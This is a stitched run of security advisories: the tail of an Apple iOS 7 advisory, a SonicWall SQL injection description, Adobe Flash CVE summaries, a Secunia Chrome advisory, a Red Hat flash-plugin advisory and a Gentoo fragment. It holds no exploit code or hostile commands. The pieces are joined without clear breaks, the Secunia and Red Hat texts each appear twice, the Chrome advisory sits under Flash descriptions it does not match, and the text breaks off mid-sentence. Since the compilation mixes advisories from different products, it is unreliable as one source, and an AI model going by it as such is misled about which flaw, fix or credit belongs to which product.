maliciously crafted web page may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in libxslt. These issues were addressed by updating libxslt to version 1.1.28. CVE-ID CVE-2012-2825 : Nicolas Gregoire CVE-2012-2870 : Nicolas Gregoire CVE-2012-2871 : Kai Lu of Fortinet's FortiGuard Labs, Nicolas Gregoire Passcode Lock Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A person with physical access to the device may be able to bypass the screen lock Description: A race condition issue existed in the handling of phone calls and SIM card ejection at the lock screen. This issue was addressed through improved lock state management. CVE-ID CVE-2013-5147 : videosdebarraquito Personal Hotspot Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker may be able to join a Personal Hotspot network Description: An issue existed in the generation of Personal Hotspot passwords, resulting in passwords that could be predicted by an attacker to join a user's Personal Hotspot. The issue was addressed by generating passwords with higher entropy. CVE-ID CVE-2013-4616 : Andreas Kurtz of NESO Security Labs and Daniel Metz of University Erlangen-Nuremberg Push Notifications Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: The push notification token may be disclosed to an app contrary to the user's decision Description: An information disclosure issue existed in push notification registration. Apps requesting access to the push notification access received the token before the user approved the app's use of push notifications. This issue was addressed by withholding access to the token until the user has approved access. CVE-ID CVE-2013-5149 : Jack Flintermann of Grouper, Inc. Safari Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of XML files. This issue was addressed through additional bounds checking. CVE-ID CVE-2013-1036 : Kai Lu of Fortinet's FortiGuard Labs Safari Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: History of pages recently visited in an open tab may remain after clearing of history Description: Clearing Safari's history did not clear the back/forward history for open tabs. This issue was addressed by clearing the back/forward history. CVE-ID CVE-2013-5150 Safari Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Viewing files on a website may lead to script execution even when the server sends a 'Content-Type: text/plain' header Description: Mobile Safari sometimes treated files as HTML files even when the server sent a 'Content-Type: text/plain' header. This may lead to cross-site scripting on sites that allow users to upload files. This issue was addressed through improved handling of files when 'Content-Type: text/plain' is set. CVE-ID CVE-2013-5151 : Ben Toews of Github Safari Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may allow an arbitrary URL to be displayed Description: A URL bar spoofing issue existed in Mobile Safari. This issue was addressed through improved URL tracking. CVE-ID CVE-2013-5152 : Keita Haga of keitahaga.com, Lukasz Pilorz of RBS Sandbox Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Applications that are scripts were not sandboxed Description: Third-party applications which used the #! syntax to run a script were sandboxed based on the identity of the script interpreter, not the script. The interpreter may not have a sandbox defined, leading to the application being run unsandboxed. This issue was addressed by creating the sandbox based on the identity of the script. CVE-ID CVE-2013-5154 : evad3rs Sandbox Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Applications can cause a system hang Description: Malicious third-party applications that wrote specific values to the /dev/random device could force the CPU to enter an infinite loop. This issue was addressed by preventing third-party applications from writing to /dev/random. CVE-ID CVE-2013-5155 : CESG Social Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Users recent Twitter activity could be disclosed on devices with no passcode. Description: An issue existed where it was possible to determine what Twitter accounts a user had recently interacted with. This issue was resolved by restricting access to the Twitter icon cache. CVE-ID CVE-2013-5158 : Jonathan Zdziarski Springboard Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A person with physical access to a device in Lost Mode may be able to view notifications Description: An issue existed in the handling of notifications when a device is in Lost Mode. This update addresses the issue with improved lock state management. CVE-ID CVE-2013-5153 : Daniel Stangroom Telephony Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Malicious apps could interfere with or control telephony functionality Description: An access control issue existed in the telephony subsystem. Bypassing supported APIs, sandboxed apps could make requests directly to a system daemon interfering with or controlling telephony functionality. This issue was addressed by enforcing access controls on interfaces exposed by the telephony daemon. CVE-ID CVE-2013-5156 : Jin Han of the Institute for Infocomm Research working with Qiang Yan and Su Mon Kywe of Singapore Management University; Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee from the Georgia Institute of Technology Twitter Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Sandboxed apps could send tweets without user interaction or permission Description: An access control issue existed in the Twitter subsystem. Bypassing supported APIs, sandboxed apps could make requests directly to a system daemon interfering with or controlling Twitter functionality. This issue was addressed by enforcing access controls on interfaces exposed by the Twitter daemon. CVE-ID CVE-2013-5157 : Jin Han of the Institute for Infocomm Research working with Qiang Yan and Su Mon Kywe of Singapore Management University; Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee from the Georgia Institute of Technology WebKit Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in WebKit. These issues were addressed through improved memory handling. CVE-ID CVE-2013-0879 : Atte Kettunen of OUSPG CVE-2013-0991 : Jay Civelli of the Chromium development community CVE-2013-0992 : Google Chrome Security Team (Martin Barbella) CVE-2013-0993 : Google Chrome Security Team (Inferno) CVE-2013-0994 : David German of Google CVE-2013-0995 : Google Chrome Security Team (Inferno) CVE-2013-0996 : Google Chrome Security Team (Inferno) CVE-2013-0997 : Vitaliy Toropov working with HP's Zero Day Initiative CVE-2013-0998 : pa_kt working with HP's Zero Day Initiative CVE-2013-0999 : pa_kt working with HP's Zero Day Initiative CVE-2013-1000 : Fermin J. Serna of the Google Security Team CVE-2013-1001 : Ryan Humenick CVE-2013-1002 : Sergey Glazunov CVE-2013-1003 : Google Chrome Security Team (Inferno) CVE-2013-1004 : Google Chrome Security Team (Martin Barbella) CVE-2013-1005 : Google Chrome Security Team (Martin Barbella) CVE-2013-1006 : Google Chrome Security Team (Martin Barbella) CVE-2013-1007 : Google Chrome Security Team (Inferno) CVE-2013-1008 : Sergey Glazunov CVE-2013-1010 : miaubiz CVE-2013-1037 : Google Chrome Security Team CVE-2013-1038 : Google Chrome Security Team CVE-2013-1039 : own-hero Research working with iDefense VCP CVE-2013-1040 : Google Chrome Security Team CVE-2013-1041 : Google Chrome Security Team CVE-2013-1042 : Google Chrome Security Team CVE-2013-1043 : Google Chrome Security Team CVE-2013-1044 : Apple CVE-2013-1045 : Google Chrome Security Team CVE-2013-1046 : Google Chrome Security Team CVE-2013-1047 : miaubiz CVE-2013-2842 : Cyril Cattiaux CVE-2013-5125 : Google Chrome Security Team CVE-2013-5126 : Apple CVE-2013-5127 : Google Chrome Security Team CVE-2013-5128 : Apple WebKit Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may lead to information disclosure Description: An information disclosure issue existed in the handling of the window.webkitRequestAnimationFrame() API. A maliciously crafted website could use an iframe to determine if another site used window.webkitRequestAnimationFrame(). This issue was addressed through improved handling of window.webkitRequestAnimationFrame(). CVE-ID CVE-2013-5159 WebKit Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Copying and pasting a malicious HTML snippet may lead to a cross-site scripting attack Description: A cross-site scripting issue existed in the handling of copied and pasted data in HTML documents. This issue was addressed through additional validation of pasted content. CVE-ID CVE-2013-0926 : Aditya Gupta, Subho Halder, and Dev Kar of xys3c (xysec.com) WebKit Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: A cross-site scripting issue existed in the handling of iframes. This issue was addressed through improved origin tracking. CVE-ID CVE-2013-1012 : Subodh Iyengar and Erling Ellingsen of Facebook WebKit Available for: iPhone 3GS and later, iPod touch (4th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to an information disclosure Description: An information disclosure issue existed in XSSAuditor. This issue was addressed through improved handling of URLs. CVE-ID CVE-2013-2848 : Egor Homakov WebKit Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Dragging or pasting a selection may lead to a cross-site scripting attack Description: Dragging or pasting a selection from one site to another may allow scripts contained in the selection to be executed in the context of the new site. This issue is addressed through additional validation of content before a paste or a drag and drop operation. CVE-ID CVE-2013-5129 : Mario Heiderich WebKit Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack Description: A cross-site scripting issue existed in the handling of URLs. This issue was addressed through improved origin tracking. CVE-ID CVE-2013-5131 : Erling A Ellingsen Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "7.0". Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJSOe4/AAoJEPefwLHPlZEwToUP/jUGETRBdUjwN/gMmQAtl6zN 0VUMbnsNH51Lhsr15p9EHYJUL97pajT0N1gdd8Q2l+2NHkQzQLJziXgsO6VFOX7e GoLNvlbyfoE0Ac9dSm9w7yi2lVf8bjGZKmEH0DAXzZD5s0ThiqPZCjTo8rCODMH2 TyQgkYtcXtrAHYaFe0dceWe3Q0ORu24cuFg0xeqX+7QvzK9mSeJWiN8OtimMzDni 5Dvgn7emHiuI6f3huQ25bEXK4gjN+CGwXg2RhQ7fwm9IeBdLnH1qKrFrrMHIhbrK ibvud5jLS0ltUH+XnfBkoCkBntOO11vYllti8oIGCgaa5NkVkEOKbHy9uh6riGHT KXYU/LfM8tt8Ax6iknn4mYC2QYbv7OIyzSfu/scWbeawsJb4OMx71oJrROTArgQG QthFQvFk7NSe5kQlNz+xQHI5LP/ZSHTKdwT69zPIzjWQBOdcZ+4GQvmMsbKIeZeY I2oIull2C7XYav8B0o+l4WlyEewNCOHQ8znapZnjCRKT/FF/ueG/WO0J4SEWUbQz Kf24sZtFtm51QekPS3vc1XHacqJLELD8ugtgYC3hh9vUqkLV3UxpLKvI8uoOPUDt SCV3qSpaxgBQtJWUZPq0MWVTDJKzX4MEB8e1p4jZAggEzfx9AdT0s7XyGm9H/UsR GowSVGG+cJtvrngVhy3E =dNVy -----END PGP SIGNATURE-----

SQL injection vulnerability in sgms/reports/scheduledreports/configure/scheduleProps.jsp in SonicWall ViewPoint 6.0 SP2 allows remote attackers to execute arbitrary SQL commands via the scheduleID parameter. SonicWall Viewpoint is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Viewpoint 6.0 SP2 is vulnerable; other versions may also be affected. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs

The ActiveX control in Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. Adobe Flash Player is prone to an unspecified remote memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Google Chrome Multiple Vulnerabilities SECUNIA ADVISORY ID: SA48265 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48265/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 RELEASE DATE: 2012-03-05 DISCUSS ADVISORY: http://secunia.com/advisories/48265/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48265/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Google Chrome, where one has an unknown impact and others can be exploited by malicious people to conduct cross-site scripting attacks, bypass certain security restrictions, and compromise a user's system. 1) A use-after-free error exists within v8 element wrapper handling. 2) A use-after-free error exists within SVG value handling. 3) A buffer overflow exists within the Skia drawing library. 4) A use-after-free error exists within SVG document handling. 5) A use-after-free error exists within SVG use handling. 6) A casting error exists within line box handling. 7) A casting error exists within anonymous block splitting. 8) A use-after-free error exists within multi-column handling. 9) A use-after-free error exists within quote handling. 10) An out-of-bounds read error exists within text handling. 11) A use-after-free error exists within class attribute handling. 12) A use-after-free error exists within table section handling. 13) A use-after-free error exists within flexbox with floats handling. 14) A use-after-free error exists within SVG animation elements handling. For more information: SA48033 SOLUTION: Update to version 17.0.963.65. PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Chamal de Silva 2, 4, 5, 14) Arthur Gerkis 3) Aki Helin, OUSPG 6, 7, 8, 9, 10, 11, 12, 13) miaubiz ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ---------------------------------------------------------------------- Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. 1) An unspecified error in an ActiveX Control can be exploited to corrupt memory. 2) A type confusion error can be exploited to corrupt memory. 3) An unspecified error related to MP4 parsing can be exploited to corrupt memory. 4) An unspecified error can be exploited to corrupt memory. 5) An unspecified error can be exploited to bypass certain security restrictions. 6) An unspecified error can be exploited to bypass certain security restrictions. Successful exploitation of the vulnerabilities #1 through #6 may allow execution of arbitrary code. 7) Certain unspecified input is not properly sanitised before being returned to the user. NOTE: This vulnerability is reportedly being actively exploited in targeted attacks

Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted MP4 data. Adobe Flash Player is prone to an unspecified remote memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2012:0144-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html Issue date: 2012-02-17 CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 CVE-2012-0767 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed on the Adobe security page APSB12-03, listed in the References section. Multiple security flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially-crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the specially-crafted SWF content. (CVE-2012-0752, CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756) A flaw in flash-plugin could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially-crafted web page. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03) 791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2012-0752.html https://www.redhat.com/security/data/cve/CVE-2012-0753.html https://www.redhat.com/security/data/cve/CVE-2012-0754.html https://www.redhat.com/security/data/cve/CVE-2012-0755.html https://www.redhat.com/security/data/cve/CVE-2012-0756.html https://www.redhat.com/security/data/cve/CVE-2012-0767.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb12-03.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq 2hfvaUbJyuTg8og5n/gSdGc= =7NQZ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Google Chrome Multiple Vulnerabilities SECUNIA ADVISORY ID: SA48265 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48265/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 RELEASE DATE: 2012-03-05 DISCUSS ADVISORY: http://secunia.com/advisories/48265/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48265/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Google Chrome, where one has an unknown impact and others can be exploited by malicious people to conduct cross-site scripting attacks, bypass certain security restrictions, and compromise a user's system. 1) A use-after-free error exists within v8 element wrapper handling. 2) A use-after-free error exists within SVG value handling. 3) A buffer overflow exists within the Skia drawing library. 4) A use-after-free error exists within SVG document handling. 5) A use-after-free error exists within SVG use handling. 6) A casting error exists within line box handling. 7) A casting error exists within anonymous block splitting. 8) A use-after-free error exists within multi-column handling. 9) A use-after-free error exists within quote handling. 10) An out-of-bounds read error exists within text handling. 11) A use-after-free error exists within class attribute handling. 12) A use-after-free error exists within table section handling. 13) A use-after-free error exists within flexbox with floats handling. 14) A use-after-free error exists within SVG animation elements handling. For more information: SA48033 SOLUTION: Update to version 17.0.963.65. PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Chamal de Silva 2, 4, 5, 14) Arthur Gerkis 3) Aki Helin, OUSPG 6, 7, 8, 9, 10, 11, 12, 13) miaubiz ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Furthermore, a remote attacker may be able to bypass intended access restrictions, bypass cross-domain policy, inject arbitrary web script, or obtain sensitive information. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228" References ========== [ 1 ] CVE-2011-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445 [ 2 ] CVE-2011-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450 [ 3 ] CVE-2011-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451 [ 4 ] CVE-2011-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452 [ 5 ] CVE-2011-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453 [ 6 ] CVE-2011-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454 [ 7 ] CVE-2011-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455 [ 8 ] CVE-2011-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456 [ 9 ] CVE-2011-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457 [ 10 ] CVE-2011-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458 [ 11 ] CVE-2011-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459 [ 12 ] CVE-2011-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460 [ 13 ] CVE-2012-0752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752 [ 14 ] CVE-2012-0753 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753 [ 15 ] CVE-2012-0754 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754 [ 16 ] CVE-2012-0755 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755 [ 17 ] CVE-2012-0756 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756 [ 18 ] CVE-2012-0767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767 [ 19 ] CVE-2012-0768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768 [ 20 ] CVE-2012-0769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769 [ 21 ] CVE-2012-0773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201204-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. 1) An unspecified error in an ActiveX Control can be exploited to corrupt memory. 2) A type confusion error can be exploited to corrupt memory. 3) An unspecified error related to MP4 parsing can be exploited to corrupt memory. 4) An unspecified error can be exploited to corrupt memory. 5) An unspecified error can be exploited to bypass certain security restrictions. 6) An unspecified error can be exploited to bypass certain security restrictions. Successful exploitation of the vulnerabilities #1 through #6 may allow execution of arbitrary code. 7) Certain unspecified input is not properly sanitised before being returned to the user. NOTE: This vulnerability is reportedly being actively exploited in targeted attacks. This fixes multiple vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks, gain knowledge of potentially sensitive information, bypass certain security restrictions, and compromise a user's system

Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) by leveraging an unspecified "type confusion.". Adobe Flash Player is prone to an unspecified remote memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2012:0144-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html Issue date: 2012-02-17 CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 CVE-2012-0767 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed on the Adobe security page APSB12-03, listed in the References section. Multiple security flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially-crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary 